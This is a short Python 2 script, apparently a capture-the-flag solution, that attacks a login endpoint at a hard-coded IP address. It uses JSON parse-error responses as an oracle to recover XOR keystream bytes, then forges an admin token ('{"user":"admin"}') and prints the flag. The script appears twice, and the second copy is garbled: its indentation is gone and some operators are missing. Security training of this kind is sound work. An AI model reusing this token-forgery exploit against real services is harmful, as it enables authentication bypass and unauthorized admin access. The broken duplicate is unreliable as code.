quandqn/admincp.py

## admincp.py
import requests

url = "http://128.199.226.92:31333/login/"
wanted = '{"user":"admin"}'
payload = ""
sig = "Expecting property name"

for i in range(15):
    for j in range(0xff):
        r = requests.get(url + payload.encode("hex") + "%02x" % j + (30-2*len(payload)) * "a")
        if sig in r.text:
            payload+= chr(j ^ ord("{") ^ 0x20)
            break

payload = "".join([chr(ord(x) ^ ord(y) ^ 0x20) for x, y in zip(payload, wanted)])

for i in range(0xff):
    r = requests.get(url + payload.encode("hex") + "%02x" % i)
    if "SVATTT" in r.text:
        print r.text
        break
	import requests

	url = "http://128.199.226.92:31333/login/"
	wanted = '{"user":"admin"}'
	payload = ""
	sig = "Expecting property name"

	for i in range(15):
	for j in range(0xff):
	r = requests.get(url + payload.encode("hex") + "%02x" % j + (30-2len(payload)) "a")
	if sig in r.text:
	payload+= chr(j ^ ord("{") ^ 0x20)
	break

	payload = "".join([chr(ord(x) ^ ord(y) ^ 0x20) for x, y in zip(payload, wanted)])

	for i in range(0xff):
	r = requests.get(url + payload.encode("hex") + "%02x" % i)
	if "SVATTT" in r.text:
	print r.text
	break